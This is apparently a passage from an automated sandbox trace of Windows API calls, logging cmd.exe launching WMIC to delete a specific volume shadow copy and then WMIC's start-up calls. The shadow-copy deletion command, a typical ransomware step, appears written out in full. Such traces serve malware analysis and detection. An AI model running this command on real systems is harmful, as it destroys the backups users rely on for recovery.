GetProcessHeap () returned 0x3c0000 [0106.760] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x9e) returned 0x3d9b20 [0106.761] GetConsoleTitleW (in: lpConsoleTitle=0x2cfa90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.761] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.761] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.761] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf620, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf600, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf600*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0106.761] GetProcessHeap () returned 0x3c0000 [0106.761] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x218) returned 0x3d9bd0 [0106.761] GetProcessHeap () returned 0x3c0000 [0106.761] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe2) returned 0x3d9df0 [0106.761] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0106.762] GetProcessHeap () returned 0x3c0000 [0106.762] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x420) returned 0x3c1320 [0106.762] SetErrorMode (uMode=0x0) returned 0x8001 [0106.762] SetErrorMode (uMode=0x1) returned 0x0 [0106.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x3c1330, lpFilePart=0x2cf320 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x2cf320*="wbem") returned 0x18 [0106.762] SetErrorMode (uMode=0x8001) returned 0x1 [0106.762] GetProcessHeap () returned 0x3c0000 [0106.762] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3c1320, Size=0x54) returned 0x3c1320 [0106.762] GetProcessHeap () returned 0x3c0000 [0106.762] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3c1320) returned 0x54 [0106.762] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0106.762] GetProcessHeap () returned 0x3c0000 [0106.762] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x48) returned 0x3d9ee0 [0106.762] GetProcessHeap () returned 0x3c0000 [0106.762] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x7c) returned 0x3d9f30 [0106.763] GetProcessHeap () returned 0x3c0000 [0106.763] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d9f30, Size=0x48) returned 0x3d9f30 [0106.763] GetProcessHeap () returned 0x3c0000 [0106.763] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3d9f30) returned 0x48 [0106.763] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.763] GetProcessHeap () returned 0x3c0000 [0106.763] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe8) returned 0x3d9f90 [0106.767] GetProcessHeap () returned 0x3c0000 [0106.767] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d9f90, Size=0x7e) returned 0x3d9f90 [0106.767] GetProcessHeap () returned 0x3c0000 [0106.767] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3d9f90) returned 0x7e [0106.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.768] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x2cf090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf090) returned 0x3da020 [0106.769] GetProcessHeap () returned 0x3c0000 [0106.769] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x28) returned 0x3d46c0 [0106.769] FindClose (in: hFindFile=0x3da020 | out: hFindFile=0x3da020) returned 1 [0106.769] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0106.769] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0106.769] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.769] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf398, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf358 | out: lpAttributeList=0x2cf398, lpSize=0x2cf358) returned 1 [0106.769] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf398, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf348, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf398, lpPreviousValue=0x0) returned 1 [0106.769] GetStartupInfoW (in: lpStartupInfo=0x2cf4b0 | out: lpStartupInfo=0x2cf4b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0106.769] GetProcessHeap () returned 0x3c0000 [0106.769] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x20) returned 0x3d46f0 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.770] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0106.771] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0106.771] GetProcessHeap () returned 0x3c0000 [0106.771] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d46f0 | out: hHeap=0x3c0000) returned 1 [0106.771] GetProcessHeap () returned 0x3c0000 [0106.771] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x12) returned 0x3d8a30 [0106.771] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0106.772] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cf3d0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf380 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete", lpProcessInformation=0x2cf380*(hProcess=0x54, hThread=0x50, dwProcessId=0x484, dwThreadId=0x788)) returned 1 [0106.802] CloseHandle (hObject=0x50) returned 1 [0106.802] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.802] GetProcessHeap () returned 0x3c0000 [0106.802] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dc360 | out: hHeap=0x3c0000) returned 1 [0106.802] GetEnvironmentStringsW () returned 0x3dad60* [0106.802] GetProcessHeap () returned 0x3c0000 [0106.802] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xae8) returned 0x3db850 [0106.802] FreeEnvironmentStringsW (penv=0x3dad60) returned 1 [0106.802] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0108.397] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2cf2c8 | out: lpExitCode=0x2cf2c8*=0x0) returned 1 [0108.398] CloseHandle (hObject=0x54) returned 1 [0108.398] _vsnwprintf (in: _Buffer=0x2cf538, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf2d8 | out: _Buffer="00000000") returned 8 [0108.398] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0108.398] GetProcessHeap () returned 0x3c0000 [0108.398] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3db850 | out: hHeap=0x3c0000) returned 1 [0108.398] GetEnvironmentStringsW () returned 0x3dad60* [0108.398] GetProcessHeap () returned 0x3c0000 [0108.398] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0e) returned 0x3db880 [0108.398] FreeEnvironmentStringsW (penv=0x3dad60) returned 1 [0108.398] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0108.398] GetProcessHeap () returned 0x3c0000 [0108.398] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3db880 | out: hHeap=0x3c0000) returned 1 [0108.398] GetEnvironmentStringsW () returned 0x3dad60* [0108.398] GetProcessHeap () returned 0x3c0000 [0108.398] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0e) returned 0x3db880 [0108.398] FreeEnvironmentStringsW (penv=0x3dad60) returned 1 [0108.398] GetProcessHeap () returned 0x3c0000 [0108.398] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d8a30 | out: hHeap=0x3c0000) returned 1 [0108.398] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf398 | out: lpAttributeList=0x2cf398) [0108.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.399] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0108.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.399] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e1e194 | out: lpMode=0x49e1e194) returned 1 [0108.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0108.399] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e1e198 | out: lpMode=0x49e1e198) returned 1 [0108.399] SetConsoleInputExeNameW () returned 0x1 [0108.399] GetConsoleOutputCP () returned 0x1b5 [0108.399] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e2bfe0 | out: lpCPInfo=0x49e2bfe0) returned 1 [0108.399] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.400] exit (_Code=0) Process: id = "33" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0xb3b3000" os_pid = "0x484" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x270" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 194 os_tid = 0x788 [0106.867] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fd70 | out: lpSystemTimeAsFileTime=0x16fd70*(dwLowDateTime=0x4744cd70, dwHighDateTime=0x1d68245)) [0106.867] GetCurrentProcessId () returned 0x484 [0106.867] GetCurrentThreadId () returned 0x788 [0106.867] GetTickCount () returned 0x115060a [0106.867] QueryPerformanceCounter (in: lpPerformanceCount=0x16fd78 | out: lpPerformanceCount=0x16fd78*=22676065187) returned 1 [0106.870] GetModuleHandleW (lpModuleName=0x0) returned 0xff1e0000 [0106.870] __set_app_type (_Type=0x1) [0106.870] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff22ced0) returned 0x0 [0106.870] __wgetmainargs (in: _Argc=0xff252380, _Argv=0xff252390, _Env=0xff252388, _DoWildCard=0, _StartInfo=0xff25239c | out: _Argc=0xff252380, _Argv=0xff252390, _Env=0xff252388) returned 0 [0106.870] ??0CHString@@QEAA@XZ () returned 0xff252ab0 [0106.871] malloc (_Size=0x30) returned 0x525a50 [0106.871] malloc (_Size=0x70) returned 0x525a90 [0106.871] malloc (_Size=0x50) returned 0x527d30 [0106.871] malloc (_Size=0x30) returned 0x527d90 [0106.871] malloc (_Size=0x48) returned 0x527dd0 [0106.871] malloc (_Size=0x30) returned 0x527e20 [0106.871] malloc (_Size=0x30) returned 0x527e60 [0106.871] ??0CHString@@QEAA@XZ () returned 0xff252f58 [0106.871] malloc (_Size=0x30) returned 0x527ea0 [0106.871] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0106.871] SetConsoleCtrlHandler (HandlerRoutine=0xff225724, Add=1) returned 1 [0106.871] _onexit (_Func=0xff23f378) returned 0xff23f378 [0106.871] _onexit (_Func=0xff23f490) returned 0xff23f490 [0106.871] _onexit (_Func=0xff23f4d0) returned 0xff23f4d0 [0106.872] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.872] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0106.876] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0106.900] CoCreateInstance (in: rclsid=0xff1e73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1e7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff252940 | out: ppv=0xff252940*=0x1f51390) returned 0x0 [0106.912] GetCurrentProcess () returned 0xffffffffffffffff [0106.912] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16fb40 | out: TokenHandle=0x16fb40*=0xf4) returned 1 [0106.912] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16fb38 | out: TokenInformation=0x0, ReturnLength=0x16fb38) returned 0 [0106.912] malloc (_Size=0x118) returned 0x5269a0 [0106.912] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x5269a0, TokenInformationLength=0x118, ReturnLength=0x16fb38 | out: TokenInformation=0x5269a0, ReturnLength=0x16fb38) returned 1 [0106.912] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x5269a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1367141533, Attributes=0xdce3), (Luid.LowPart=0x0, Luid.HighPart=5406432, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0106.912] free (_Block=0x5269a0) [0106.912] CloseHandle (hObject=0xf4) returned 1 [0106.912] malloc (_Size=0x40) returned 0x527ee0 [0106.912] malloc (_Size=0x40) returned 0x527f30 [0106.912] malloc (_Size=0x40) returned 0x527f80 [0106.912] malloc (_Size=0x20a) returned 0x5269a0 [0106.912] GetSystemDirectoryW (in: lpBuffer=0x5269a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.913] free (_Block=0x5269a0) [0106.913] malloc (_Size=0x18) returned 0x34dfb0 [0106.913] malloc (_Size=0x18) returned 0x5269a0 [0106.913] malloc (_Size=0x18) returned 0x5269c0 [0106.913] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0106.913] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0106.913] free (_Block=0x34dfb0) [0106.913] free (_Block=0x5269a0) [0106.913] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0106.913] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0106.914] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0106.914] FreeLibrary (hLibModule=0x77940000) returned 1 [0106.914] free (_Block=0x5269c0) [0106.914] _vsnwprintf (in: _Buffer=0x527f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f768 | out: _Buffer="ms_409") returned 6 [0106.914] malloc (_Size=0x20) returned 0x5269a0 [0106.914] GetComputerNameW (in: lpBuffer=0x5269a0, nSize=0x16fb40 | out: lpBuffer="XDUWTFONO", nSize=0x16fb40) returned 1 [0106.915] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.915] malloc (_Size=0x14) returned 0x34dfb0 [0106.915] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.915] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16fb38 | out: lpNameBuffer=0x0, nSize=0x16fb38) returned 0x7fffffde000 [0106.917] GetLastError () returned 0xea [0106.917] malloc (_Size=0x40) returned 0x5269d0 [0106.917] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5269d0, nSize=0x16fb38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16fb38) returned 0x1 [0106.917] lstrlenW (lpString="") returned 0 [0106.917] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.917] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0106.919] lstrlenW (lpString=".") returned 1 [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0106.919] lstrlenW (lpString="LOCALHOST") returned 9 [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0106.919] free (_Block=0x34dfb0) [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] malloc (_Size=0x14) returned 0x34dfb0 [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] malloc (_Size=0x14) returned 0x526a20 [0106.919] lstrlenW (lpString="XDUWTFONO") returned 9 [0106.919] malloc (_Size=0x8) returned 0x526a40 [0106.919] malloc (_Size=0x18) returned 0x526a60 [0106.920] malloc (_Size=0x30) returned 0x526a80 [0106.920] malloc (_Size=0x18) returned 0x526ac0 [0106.920] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.920] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.920] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.920] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.920] malloc (_Size=0x30) returned 0x526ae0 [0106.920] malloc (_Size=0x18) returned 0x526b20 [0106.920] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.920] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.920] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.920] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.920] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.920] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.920] malloc (_Size=0x30) returned 0x526b40 [0106.920] malloc (_Size=0x18) returned 0x526b80 [0106.920] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.920] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.920] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.920] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.920] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.920] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.920] malloc (_Size=0x30) returned 0x526ba0 [0106.921] malloc (_Size=0x18) returned 0x526be0 [0106.921] malloc (_Size=0x30) returned 0x526c00 [0106.921] malloc (_Size=0x18) returned 0x526c40 [0106.921] SysStringLen (param_1="NONE") returned 0x4 [0106.921] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.921] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.921] SysStringLen (param_1="NONE") returned 0x4 [0106.921] malloc (_Size=0x30) returned 0x526c60 [0106.921] malloc (_Size=0x18) returned 0x526ca0 [0106.921] SysStringLen (param_1="CONNECT") returned 0x7 [0106.921] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.921] malloc (_Size=0x30) returned 0x526cc0 [0106.921] malloc (_Size=0x18) returned 0x526d00 [0106.921] SysStringLen (param_1="CALL") returned 0x4 [0106.921] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.921] SysStringLen (param_1="CALL") returned 0x4 [0106.921] SysStringLen (param_1="CONNECT") returned 0x7 [0106.921] malloc (_Size=0x30) returned 0x526d20 [0106.921] malloc (_Size=0x18) returned 0x526d60 [0106.921] SysStringLen (param_1="PKT") returned 0x3 [0106.921] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.921] SysStringLen (param_1="PKT") returned 0x3 [0106.921] SysStringLen (param_1="NONE") returned 0x4 [0106.921] SysStringLen (param_1="NONE") returned 0x4 [0106.921] SysStringLen (param_1="PKT") returned 0x3 [0106.921] malloc (_Size=0x30) returned 0x526d80 [0106.921] malloc (_Size=0x18) returned 0x526dc0 [0106.922] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.922] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.922] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.922] SysStringLen (param_1="NONE") returned 0x4 [0106.922] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.922] SysStringLen (param_1="PKT") returned 0x3 [0106.922] SysStringLen (param_1="PKT") returned 0x3 [0106.922] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.922] malloc (_Size=0x30) returned 0x528000 [0106.924] malloc (_Size=0x18) returned 0x526de0 [0106.924] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.924] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.924] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.924] SysStringLen (param_1="PKT") returned 0x3 [0106.924] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.924] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.924] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.924] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.924] malloc 